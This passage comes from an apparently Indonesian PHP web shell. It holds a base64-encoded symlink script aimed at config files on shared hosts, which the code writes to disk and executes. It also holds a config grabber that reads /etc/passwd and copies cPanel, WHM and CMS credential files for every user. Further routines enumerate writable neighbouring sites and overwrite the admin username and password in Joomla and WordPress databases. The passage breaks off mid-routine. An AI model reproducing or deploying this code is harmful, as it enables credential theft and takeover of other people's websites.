d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
1086 $file = "pastigans_config/vhost.cin";
1087 $handle = fopen($file ,"w+");
1088 fwrite($handle ,base64_decode($vhost));
1089 fclose($handle);
1090 chmod($file, 0755);
1091 if(exe("cd pastigans_config && ./vhost.cin")) {
1092 echo "<center><a href='$link_config/pastigans_config'><font color=lime>Done</font></a></center>";
1093 } else {
1094 echo "<center><a href='$link_config/pastigans_config/vhost.cin'><font color=lime>Done</font></a></center>";
1095 }
1096
1097 } else {
1098 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
1099 while($passwd = fgets($etc)) {
1100 if($passwd == "" || !$etc) {
1101 echo "<font color=red>Can't read /etc/passwd</font>";
1102 } else {
1103 preg_match_all('/(.*?):x:/', $passwd, $user_config);
1104 foreach($user_config[1] as $user_idx) {
1105 $user_config_dir = "/home/$user_idx/public_html/";
1106 if(is_readable($user_config_dir)) {
1107 $grab_config = array(
1108 "/home/$user_idx/.my.cnf" => "cpanel",
1109 "/home/$user_idx/.accesshash" => "WHM-accesshash",
1110 "$user_config_dir/po-content/config.php" => "Popoji",
1111 "$user_config_dir/vdo_config.php" => "Voodoo",
1112 "$user_config_dir/bw-configs/config.ini" => "BosWeb",
1113 "$user_config_dir/config/koneksi.php" => "Lokomedia",
1114 "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
1115 "$user_config_dir/clientarea/configuration.php" => "WHMCS",
1116 "$user_config_dir/whm/configuration.php" => "WHMCS",
1117 "$user_config_dir/whmcs/configuration.php" => "WHMCS",
1118 "$user_config_dir/forum/config.php" => "phpBB",
1119 "$user_config_dir/sites/default/settings.php" => "Drupal",
1120 "$user_config_dir/config/settings.inc.php" => "PrestaShop",
1121 "$user_config_dir/app/etc/local.xml" => "Magento",
1122 "$user_config_dir/joomla/configuration.php" => "Joomla",
1123 "$user_config_dir/configuration.php" => "Joomla",
1124 "$user_config_dir/wp/wp-config.php" => "WordPress",
1125 "$user_config_dir/wordpress/wp-config.php" => "WordPress",
1126 "$user_config_dir/wp-config.php" => "WordPress",
1127 "$user_config_dir/admin/config.php" => "OpenCart",
1128 "$user_config_dir/slconfig.php" => "Sitelok",
1129 "$user_config_dir/application/config/database.php" => "Ellislab");
1130 foreach($grab_config as $config => $nama_config) {
1131 $ambil_config = file_get_contents($config);
1132 if($ambil_config == '') {
1133 } else {
1134 $file_config = fopen("pastigans_config/$user_idx-$nama_config.txt","w");
1135 fputs($file_config,$ambil_config);
1136 }
1137 }
1138 }
1139 }
1140 }
1141 }
1142 echo "<center><a href='?dir=$dir/pastigans_config'><font color=lime>Done</font></a></center>";
1143 }
1144
1145} elseif ($_GET['do'] == 'config2') {
1146
1147if($_POST){
1148 $passwd = $_POST['passwd'];
1149 mkdir("pastiganteng_config", 0777);
1150 $isi_htc = "Options allnRequire NonenSatisfy Any";
1151 $htc = fopen("pastiganteng_config/.htaccess","w");
1152 fwrite($htc, $isi_htc);
1153 preg_match_all('/(.*?):x:/', $passwd, $user_config);
1154 foreach($user_config[1] as $user_pastiganteng) {
1155 $user_config_dir = "/home/$user_pastiganteng/public_html/";
1156 if(is_readable($user_config_dir)) {
1157 $grab_config = array(
1158 "/home/$user_pastiganteng/.my.cnf" => "cpanel",
1159 "/home/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1160 "/home/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1161 "/home/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1162 "/home/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1163 "/home/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1164 "/home/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1165 "/home/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1166 "/home/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1167 "/home/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal",
1168 "/home/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1169 "/home/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1170 "/home/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1171 "/home/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1172 "/home/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1173 "/home/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1174 "/home/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1175 "/home/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1176 "/home/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1177 "/home/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab",
1178 "/home1/$user_pastiganteng/.my.cnf" => "cpanel",
1179 "/home1/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1180 "/home1/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1181 "/home1/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1182 "/home1/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1183 "/home1/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1184 "/home1/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1185 "/home1/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1186 "/home1/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1187 "/home1/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1188 "/home1/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1189 "/home1/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1190 "/home1/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1191 "/home1/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1192 "/home1/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1193 "/home1/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1194 "/home1/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1195 "/home1/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1196 "/home1/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab",
1197 "/home2/$user_pastiganteng/.my.cnf" => "cpanel",
1198 "/home2/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1199 "/home2/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1200 "/home2/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1201 "/home2/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1202 "/home2/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1203 "/home2/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1204 "/home2/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1205 "/home2/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1206 "/home2/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal",
1207 "/home2/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1208 "/home2/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1209 "/home2/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1210 "/home2/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1211 "/home2/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1212 "/home2/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1213 "/home2/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1214 "/home2/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1215 "/home2/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1216 "/home2/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab",
1217 "/home3/$user_pastiganteng/.my.cnf" => "cpanel",
1218 "/home3/$user_pastiganteng/.accesshash" => "WHM-accesshash",
1219 "/home3/$user_pastiganteng/public_html/bw-configs/config.ini" => "BosWeb",
1220 "/home3/$user_pastiganteng/public_html/config/koneksi.php" => "Lokomedia",
1221 "/home3/$user_pastiganteng/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1222 "/home3/$user_pastiganteng/public_html/clientarea/configuration.php" => "WHMCS",
1223 "/home3/$user_pastiganteng/public_html/whm/configuration.php" => "WHMCS",
1224 "/home3/$user_pastiganteng/public_html/whmcs/configuration.php" => "WHMCS",
1225 "/home3/$user_pastiganteng/public_html/forum/config.php" => "phpBB",
1226 "/home3/$user_pastiganteng/public_html/sites/default/settings.php" => "Drupal",
1227 "/home3/$user_pastiganteng/public_html/config/settings.inc.php" => "PrestaShop",
1228 "/home3/$user_pastiganteng/public_html/app/etc/local.xml" => "Magento",
1229 "/home3/$user_pastiganteng/public_html/joomla/configuration.php" => "Joomla",
1230 "/home3/$user_pastiganteng/public_html/configuration.php" => "Joomla",
1231 "/home3/$user_pastiganteng/public_html/wp/wp-config.php" => "WordPress",
1232 "/home3/$user_pastiganteng/public_html/wordpress/wp-config.php" => "WordPress",
1233 "/home3/$user_pastiganteng/public_html/wp-config.php" => "WordPress",
1234 "/home3/$user_pastiganteng/public_html/admin/config.php" => "OpenCart",
1235 "/home3/$user_pastiganteng/public_html/slconfig.php" => "Sitelok",
1236 "/home3/$user_pastiganteng/public_html/application/config/database.php" => "Ellislab"
1237 );
1238 foreach($grab_config as $config => $nama_config) {
1239 $ambil_config = file_get_contents($config);
1240 if($ambil_config == '') {
1241 } else {
1242 $file_config = fopen("pastiganteng_config/$user_pastiganteng-$nama_config.txt","w");
1243 fputs($file_config,$ambil_config);
1244 }
1245 }
1246 }
1247 }
1248 echo "<center><a href='?dir=$dir/pastiganteng_config'><font color=lime>Done</font></a></center>";
1249 }else{
1250
1251 echo "<form method='post' action=''><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name='passwd' class='area' rows='15' cols='60'>";
1252 echo file_get_contents('/etc/passwd');
1253 echo "</textarea><br><input type='submit' value=' >> '></td></tr></center>";
1254 }
1255
1256
1257} elseif($_GET['do'] == 'jumping') {
1258 $i = 0;
1259 echo "<div class='margin: 5px auto;'>";
1260 if(preg_match("/hsphere/", $dir)) {
1261 $urls = explode("\r\n", $_POST['url']);
1262 if(isset($_POST['jump'])) {
1263 echo "<pre>";
1264 foreach($urls as $url) {
1265 $url = str_replace(array("http://","www."), "", strtolower($url));
1266 $etc = "/etc/passwd";
1267 $f = fopen($etc,"r");
1268 while($gets = fgets($f)) {
1269 $pecah = explode(":", $gets);
1270 $user = $pecah[0];
1271 $dir_user = "/hsphere/local/home/$user";
1272 if(is_dir($dir_user) === true) {
1273 $url_user = $dir_user."/".$url;
1274 if(is_readable($url_user)) {
1275 $i++;
1276 $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1277 if(is_writable($url_user)) {
1278 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1279 }
1280 echo $jrw."<br>";
1281 }
1282 }
1283 }
1284 }
1285 if($i == 0) {
1286 } else {
1287 echo "<br>Total ada ".$i." Kamar di ".$ip;
1288 }
1289 echo "</pre>";
1290 } else {
1291 echo '<center>
1292 <form method="post">
1293 List Domains: <br>
1294 <textarea name="url" style="width: 500px; height: 250px;">';
1295 $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1296 while($getss = fgets($fp)) {
1297 echo $getss;
1298 }
1299 echo '</textarea><br>
1300 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1301 </form></center>';
1302 }
1303 } elseif(preg_match("/vhosts|vhost/", $dir)) {
1304 preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
1305 $urls = explode("\r\n", $_POST['url']);
1306 if(isset($_POST['jump'])) {
1307 echo "<pre>";
1308 foreach($urls as $url) {
1309 $url = str_replace("www.", "", $url);
1310 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
1311 if(is_dir($web_vh) === true) {
1312 if(is_readable($web_vh)) {
1313 $i++;
1314 $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1315 if(is_writable($web_vh)) {
1316 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1317 }
1318 echo $jrw."<br>";
1319 }
1320 }
1321 }
1322 if($i == 0) {
1323 } else {
1324 echo "<br>Total ada ".$i." Kamar di ".$ip;
1325 }
1326 echo "</pre>";
1327 } else {
1328 echo '<center>
1329 <form method="post">
1330 List Domains: <br>
1331 <textarea name="url" style="width: 500px; height: 250px;">';
1332 bing("ip:$ip");
1333 echo '</textarea><br>
1334 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1335 </form></center>';
1336 }
1337 } else {
1338 echo "<pre>";
1339 $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1340 while($passwd = fgets($etc)) {
1341 if($passwd == '' || !$etc) {
1342 echo "<font color=red>Can't read /etc/passwd</font>";
1343 } else {
1344 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1345 foreach($user_jumping[1] as $user_idx_jump) {
1346 $user_jumping_dir = "/home/$user_idx_jump/public_html";
1347 if(is_readable($user_jumping_dir)) {
1348 $i++;
1349 $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1350 if(is_writable($user_jumping_dir)) {
1351 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1352 }
1353 echo $jrw;
1354 if(function_exists('posix_getpwuid')) {
1355 $domain_jump = file_get_contents("/etc/named.conf");
1356 if($domain_jump == '') {
1357 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1358 } else {
1359 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1360 foreach($domains_jump[1] as $dj) {
1361 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1362 $user_jumping_url = $user_jumping_url['name'];
1363 if($user_jumping_url == $user_idx_jump) {
1364 echo " => ( <u>$dj</u> )<br>";
1365 break;
1366 }
1367 }
1368 }
1369 } else {
1370 echo "<br>";
1371 }
1372 }
1373 }
1374 }
1375 }
1376 if($i == 0) {
1377 } else {
1378 echo "<br>Total ada ".$i." Kamar di ".$ip;
1379 }
1380 echo "</pre>";
1381 }
1382 echo "</div>";
1383} elseif($_GET['do'] == 'auto_edit_user') {
1384 if($_POST['hajar']) {
1385 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1386 echo "username atau password harus lebih dari 6 karakter";
1387 } else {
1388 $user_baru = $_POST['user_baru'];
1389 $pass_baru = md5($_POST['pass_baru']);
1390 $conf = $_POST['config_dir'];
1391 $scan_conf = scandir($conf);
1392 foreach($scan_conf as $file_conf) {
1393 if(!is_file("$conf/$file_conf")) continue;
1394 $config = file_get_contents("$conf/$file_conf");
1395 if(preg_match("/JConfig|joomla/",$config)) {
1396 $dbhost = ambilkata($config,"host = '","'");
1397 $dbuser = ambilkata($config,"user = '","'");
1398 $dbpass = ambilkata($config,"password = '","'");
1399 $dbname = ambilkata($config,"db = '","'");
1400 $dbprefix = ambilkata($config,"dbprefix = '","'");
1401 $prefix = $dbprefix."users";
1402 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1403 $db = mysql_select_db($dbname);
1404 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1405 $result = mysql_fetch_array($q);
1406 $id = $result['id'];
1407 $site = ambilkata($config,"sitename = '","'");
1408 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1409 echo "Config => ".$file_conf."<br>";
1410 echo "CMS => Joomla<br>";
1411 if($site == '') {
1412 echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1413 } else {
1414 echo "Sitename => $site<br>";
1415 }
1416 if(!$update OR !$conn OR !$db) {
1417 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1418 } else {
1419 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1420 }
1421 mysql_close($conn);
1422 } elseif(preg_match("/WordPress/",$config)) {
1423 $dbhost = ambilkata($config,"DB_HOST', '","'");
1424 $dbuser = ambilkata($config,"DB_USER', '","'");
1425 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1426 $dbname = ambilkata($config,"DB_NAME', '","'");
1427 $dbprefix = ambilkata($config,"table_prefix = '","'");
1428 $prefix = $dbprefix."users";
1429 $option = $dbprefix."options";
1430 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1431 $db = mysql_select_db($dbname);
1432 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1433 $result = mysql_fetch_array($q);
1434 $id = $result[ID];
1435 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1436 $result2 = mysql_fetch_array($q2);
1437 $target = $result2[option_value];
1438 if($target == '') {
